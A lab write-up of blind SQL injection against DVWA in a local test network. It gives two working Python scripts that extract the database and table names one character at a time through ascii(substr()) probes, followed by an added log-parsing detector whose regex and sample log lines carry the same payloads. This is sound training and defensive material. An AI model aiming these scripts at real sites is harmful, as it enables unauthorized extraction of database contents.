Purpose
Understand the principles, methods and process of blind SQL injection, and use database-specific functions to probe the database one character at a time and so extract information.
Environment
System: Kali Linux 2019 (IP: 10.10.10.128 )
Platform: OWASPBWA v0.94 in DVWA (IP: 10.10.10.131)
Interface
Operation
The idea is to use the substr() function to take the database name one character at a time, convert that character to its ASCII value, and compare it against candidate values position by position; the page's response tells us whether the guess was correct.
Syntax
substr(string, offset, length)
- string: required, the database field or expression to take characters from
- offset: required, the starting position within the string (1-based)
- length: required, the number of characters to take
Python code
Probing the database name
import requests
import re

# Request headers for the DVWA session; the Cookie carries the logged-in
# PHPSESSID and the security level, without which the injection page is not reachable
header={
    "Host":"10.10.10.131",
    "User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
    "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language":"en-US,en;q=0.5",
    "Accept-Encoding":"gzip, deflate",
    "Cookie":"security=low; PHPSESSID=vr7sjjt900ulgougqr1asmb346; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada",
    "Connection":"close",
    "Upgrade-Insecure-Requests":"1",
    "Cache-Control":"max-age=0"
}

def getDBName():
    DBName = ""
    # Boolean-blind probe: {0} is the character position, {1} the guessed ASCII value;
    # the page only prints "Surname:" when the comparison is true
    url_template = "http://10.10.10.131/dvwa/vulnerabilities/sqli_blind/?id=1' and ascii(substr(database(),{0},1))={1} %23&Submit=Submit"
    chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    print("Start to retrieve database name...")
    for i in range(1,5):            # position within the database name
        for char in chars:          # candidate character for that position
            char_ascii=ord(char)
            url = url_template.format(i,char_ascii)
            response = requests.session().get(url,headers=header)
            pattern = re.compile(r'Surname:')
            match = pattern.search(response.text)
            if match:               # true branch: this character is correct
                DBName += char
                break
    print("Retrieve completed\nDBName is: " + DBName)

getDBName()
The script imports requests and re. Because the injection point is only reachable after logging in, the request must carry the headers of an authenticated session (in particular the Cookie), and the response should be fetched through a session object (requests.session()). Most examples found online simply call requests.get(url), so adapt this to your own setup. Also make sure the URL contains every field the form submits: I initially forgot the "&Submit=Submit" parameter, and the script returned no results.
Probing the table names
import requests
import re

# Same authenticated DVWA session headers as in the database-name script
header={
    "Host":"10.10.10.131",
    "User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
    "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language":"en-US,en;q=0.5",
    "Accept-Encoding":"gzip, deflate",
    "Cookie":"security=low; PHPSESSID=vr7sjjt900ulgougqr1asmb346; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada",
    "Connection":"close",
    "Upgrade-Insecure-Requests":"1",
    "Cache-Control":"max-age=0"
}

def getTableName():
    # {0} selects the table (limit offset), {1} the character position, {2} the guessed ASCII value
    url_template = "http://10.10.10.131/dvwa/vulnerabilities/sqli_blind/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1))={2} %23&Submit=Submit#"
    chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    print("Start to retrieve table name...")
    print("-------------------------------")
    for i in range(0,2):            # number of tables to enumerate
        TableName = ""
        for j in range(1,10):       # maximum length of table_name
            for char in chars:
                char_ascii=ord(char)
                url = url_template.format(i,j,char_ascii)
                response = requests.session().get(url,headers=header)
                pattern = re.compile(r'Surname:')
                match = pattern.search(response.text)
                if match:           # true branch: this character is correct
                    TableName += char
                    break
        if len(TableName) == 0:
            print("Can't find")
        else:
            print(TableName)
        print("-------------------------------")
    print("Finish retrieving!")

getTableName()
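The requests generated by the two scripts above leave a recognisable trail in the web server's access log. As an added defender-side example that is not part of the original post, the following script parses constructed Apache-style log lines (a hypothetical sample, not a real capture), URL-decodes each query parameter, flags requests carrying the ascii(substr(...))=N comparison used on this page, and counts flagged requests per client, since a character-by-character extraction produces many near-identical requests from one source.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines modelled on the page's probing requests (hypothetical sample).
SAMPLE_LOG = """\
10.10.10.128 - - [12/May/2019:10:01:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3D100+%23&Submit=Submit HTTP/1.1" 200 4321
10.10.10.128 - - [12/May/2019:10:01:02 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3D101+%23&Submit=Submit HTTP/1.1" 200 4321
10.10.10.128 - - [12/May/2019:10:01:03 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28%28select+table_name+from+information_schema.tables+where+table_schema%3Ddatabase%28%29+limit+0%2C1%29%2C1%2C1%29%29%3D103+%23&Submit=Submit HTTP/1.1" 200 4321
10.10.10.50 - - [12/May/2019:10:01:04 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4321
10.10.10.50 - - [12/May/2019:10:01:05 +0000] "GET /dvwa/index.php HTTP/1.1" 200 1200
"""

# Client IP, request target and status code from a combined-format entry.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Boolean-blind signature used on this page: an ascii(substr(...)) = <number>
# comparison, which only makes sense as a character-by-character oracle.
BLIND_SIG = re.compile(r"ascii\s*\(\s*substr\s*\(.*\)\s*=\s*\d+", re.IGNORECASE | re.DOTALL)

def parse_line(line):
    """Return (ip, path, query_string) for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return m.group("ip"), parts.path, parts.query

def find_blind_sqli(log_text):
    """Return (ip, path, param, decoded_value) for every request carrying the signature."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None or not parsed[2]:
            continue
        ip, path, query = parsed
        # parse_qs percent-decodes and turns '+' into spaces, so the payload is seen as the database sees it
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                if BLIND_SIG.search(value):
                    hits.append((ip, path, param, value))
    return hits

def summarize(hits, threshold=2):
    """Count flagged requests per client and report those at or above threshold."""
    counts = Counter(ip for ip, _, _, _ in hits)
    return {ip: n for ip, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    print(summarize(find_blind_sqli(SAMPLE_LOG)))
```

On the sample above only 10.10.10.128 is reported, with three flagged requests; the plain id=1 request from 10.10.10.50 is not flagged.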
Summary
The whole process is fairly simple, but in practice it did not go so smoothly; it needs more practice.
Take notes, stay motivated!